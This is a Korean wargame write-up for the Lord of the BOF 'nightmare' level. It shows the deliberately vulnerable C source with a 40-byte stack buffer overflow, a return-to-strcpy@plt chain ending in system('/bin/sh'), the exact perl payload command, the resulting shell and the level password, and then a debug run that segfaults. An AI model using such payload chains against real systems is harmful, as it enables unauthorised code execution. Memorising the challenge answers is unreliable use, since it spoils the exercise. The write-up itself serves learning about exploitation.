상대적으로 금방풀었네요
[succubus@localhost succubus]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
/*
 * Entry point of the LOB "nightmare" challenge.  This is a deliberately
 * vulnerable binary: the unbounded copy and the post-copy memset below are
 * the exercise, not defects to be patched.
 *
 * argv[1] is the attacker-controlled input.  Its bytes at offset 44..47 must
 * equal the value of &strcpy taken as a function pointer; in a non-PIE,
 * dynamically linked build that resolves to the strcpy@plt stub, which is
 * what the "PLT" tag in the file header refers to -- confirm against the
 * real binary.  On any check failure the process prints a message and
 * exits with status 0.  Implicit-int return type (pre-C99 style).
 */
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address: the 4 bytes at argv[1]+44 must equal &strcpy.  Nothing
// verifies strlen(argv[1]) >= 48 first, so a shorter argv[1] makes memcmp
// read past the end of the argument string.
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!  Unbounded strcpy into a 40-byte stack buffer: any input longer
// than 40 bytes spills past buffer into the saved frame pointer and return
// address (offset 44 is the slot the check above targets, under the usual
// buffer | saved ebp | return address layout -- compiler-dependent).
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall: after the copy, the 4 bytes at offset 48 -- the word
// immediately past the 4-byte return-address slot at offset 44 -- are
// overwritten with 'A', clobbering whatever argv[1] placed there.
// NOTE(review): in a return-to-strcpy chain that word is the address strcpy
// itself returns through, so a payload cannot simply leave its next address
// here; it has to be rewritten at run time (e.g. by the strcpy call that is
// returned into).
memset(buffer+40+8, 'A', 4);
}
소스에서 ret 자리(argv[1]+44)에 strcpy@plt 주소를 넣도록 memcmp 로 강제하는 것을 보고, RTL(return-to-library/PLT) 방식으로 접근해야겠다고 생각했습니다.
[payload]
argv[1]
buf40 | SFP | &strcpy@plt | dummy (strcpy 의 복귀 주소 자리; memset 이 'AAAA' 로 덮음) | dest(&buffer+48 = 그 dummy 자리) | source(argv[2])
→ main 이 return 하면 strcpy@plt 가 argv[2] 를 &buffer+48 에 복사하므로, memset 이 넣은 'AAAA' 가 &system 으로 바뀌고 strcpy 가 return 할 때 system("/bin/sh") 이 실행됩니다.
argv[2]
&system | &exit |&/bin/sh
+)&system &exit &/bin/sh &strcpy@plt 구하는건 누구나 다 할수 있으므로 생략
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "a"x44,"\x10\x84\x04\x08","AAAA","\xa0\xfa\xff\xbf","\x32\xfc\xff\xbf"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?AAAA????
bash$ my-pass
euid = 518
beg for me
&buffer+48 이랑 &argv[2] 는 소스에 출력문을 추가해서 구했는데, 한 가지 의문이 남는 부분이 있습니다.
---------------------------------------------------------------------------------------------------
ex1)
[succubus@localhost /tmp]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
/*
 * Debug copy of the LOB "nightmare" entry point, built separately in /tmp
 * to print the addresses the payload needs.  Same deliberately vulnerable
 * logic as the original: the unbounded copy and the post-copy memset are
 * the exercise, not defects to be patched.
 *
 * argv[1] is the attacker-controlled input.  Its bytes at offset 44..47 must
 * equal the value of &strcpy taken as a function pointer; in a non-PIE,
 * dynamically linked build that resolves to the strcpy@plt stub (the "PLT"
 * tag in the file header) -- confirm against the real binary.  On any check
 * failure the process prints a message and exits with status 0.
 * Implicit-int return type (pre-C99 style).
 */
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address: the 4 bytes at argv[1]+44 must equal &strcpy.  Nothing
// verifies strlen(argv[1]) >= 48 first, so a shorter argv[1] makes memcmp
// read past the end of the argument string.
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!  Unbounded strcpy into a 40-byte stack buffer: any input longer
// than 40 bytes spills past buffer into the saved frame pointer and return
// address.  Adding the two printf calls below may change this frame's
// layout relative to the original binary, so offsets measured here need
// re-checking against the real target.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall: the 4 bytes at offset 48 -- the word immediately past
// the 4-byte return-address slot at offset 44 -- are overwritten with 'A'.
memset(buffer+40+8, 'A', 4);
// Debug output added for the exploit: where the copy landed and where
// argv[2] lives.  %x expects an unsigned int; passing a pointer is undefined
// behavior per the standard (it happens to print the 32-bit address here).
// %p is the portable conversion.
printf("buffer Using : %x\n",buffer);
printf("argv[2] Using : %x\n",argv[2]);
}
[succubus@localhost /tmp]$ ./nightmare `perl -e 'print "\x90"x44,"\x10\x84\x04\x08","aaaa","bbbb","cccc"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`
?????????????????????????????????????????????aaaabbbbcccc
buffer Using : bffffa70
Segmentation fault (core dumped)